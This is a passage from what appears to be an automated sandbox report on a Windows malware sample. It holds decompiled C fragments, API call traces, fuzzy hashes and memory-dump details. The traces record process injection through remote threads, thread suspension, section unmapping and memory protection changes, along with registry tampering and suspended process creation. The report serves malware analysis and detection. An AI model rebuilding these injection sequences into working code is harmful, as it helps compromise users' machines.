						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E144C, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 49 Total matches: 9memory

Similarity

Total matches: 9
API ID: HeapFreeStrStrI
String ID: pnls
API String ID: 4137399961-141991303
Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885

APIs

Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3

HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE

Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31

StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4

Strings

pnls, xrefs: 002E1451, 002E1460, 002E1477, 002E1484

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
